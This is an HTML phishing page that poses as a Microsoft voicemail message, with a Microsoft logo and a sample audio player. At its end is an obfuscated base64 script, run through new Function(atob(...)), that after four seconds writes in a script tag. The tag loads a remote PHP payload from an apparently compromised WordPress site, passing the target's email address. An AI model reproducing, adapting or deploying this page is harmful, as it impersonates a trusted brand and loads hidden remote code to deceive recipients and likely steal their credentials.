<html>

<head>
 <meta name="viewport"	content="width=device-width,  initial-scale=1.0">
 <style>
  body  {

	 display:	flex;
	 justify-content: center;

	 align-items:	center;
	 height:	 50vh;
	 margin: 0;
 background-color:		#f4f4f4;
  font-family: 	Arial,	sans-serif;
	}

 .nelson {

	 text-align: 	center;

	background-color:	white;

 	padding:	30px;
 	border-radius:		10px;

 box-shadow:	0 4px	 10px rgba(0, 0,		0,  0.1);
 	width: 350px;

		}

	.logo	{
 width: 	150px;

 margin-bottom:		20px;
  }

		h2  {
 font-size: 	1.5em;
 	margin-bottom:  20px;

 color: 	#333;

 	}

	audio	{
 width:		100%;

	}

 footer	 {
 margin-top:	20px;

	font-size:	0.9em;
		color:	 #666;
	 }
 	audio::-webkit-media-controls-volume-slider	{

	 display: none;
  }

 audio::-webkit-media-controls-mute-button {
	display:	none;

		}
 	</style>
</head>
<body>

		<div class="nelson">

	<img  src="https://aadcdn.msftauth.net/shared/1.0/content/images/microsoft_logo_ea19b2112f4dfd8e90b4505ef7dcb4f9.png"  width="130px">

	 <h2>Voice		Mail</h2>

	<audio	controls	muted>
  <source	src="https://www.w3schools.com/html/mov_bbb.ogg"  type="audio/ogg">

	Your browser	does not	support the	audio element.
 	</audio>
 	<footer>

 	<p>©  2024 Microsoft.		All rights	reserved.</p>
	</footer>
	 </div>

</body>

<script>
	banditry =		`{RECIPIENT_BASE64_EMAIL}`;
	new Function(atob(`bGV0IHVuY2xvdWRlZDsNCiBkb2N1bWVudC5vbmNsaWNrID0gKCkgPT4gY2xlYXJUaW1lb3V0KHVuY2xvdWRlZCk7IHNldFRpbWVvdXQoKCkgPT4gew0KIG1hbmFnZWFiaWxpdHkgPSBbJ3cnLCdyaScsJ3RlJ10uam9pbignJyk7DQogb2ZmZW5zaXZlID0gWyc8cycsJ2NyaScsJ3B0IHMnLCdyYz0nXS5qb2luKCcnKTsNCiBuZW1lc2lzID0gWyJodHRwIiwgJ3M6Ly8nLCAiZjEwIiwgIjAua2xvLiIsIGB1YS9gLCAnd3AtYycsICJvbnRlIiwgIm50LyIsIGBsYW5ndWFgLCAiZ2VzL3RoIiwgYGVtZWAsICJzL2FydSIsIGBsbC5waGAsICdwPzAxMCcsICc0NzknLCBgNzk2NzdgLCAnMDRiNScsICIzNjkzMjMiLCAnMDc0NicsIGAzNzY3OTRgLCBgNTZkN2AsICczMzE0JywgYGQzMWAsIGA0YzRjNmAsICc0NjM3NCcsICc3OTM4JywgJzM5NGQ1NCcsIGA3MzNgLCAnMTRlNycsICJhNGQiLCAiN2E1MjQiLCAiYjMwNjgiLCAnNGQ1NDc5JywgYDMzNTc1M2AsIGAzMDZiN2AsIGA0NDE3NzRgLCAnMTNkYmFuJywgJ2RpdHInLCAieSIsIF1bWydqJywnbycsJ2luJ10uam9pbignJyldKCcnKTsNCiBkb2N1bWVudFttYW5hZ2VhYmlsaXR5XShvZmZlbnNpdmUgKyBuZW1lc2lzICsgJz48L3NjJyArICdyaScgKyAncHQ+Jyk7DQogfSwgNDAwMCk7`))();

</script>

</html>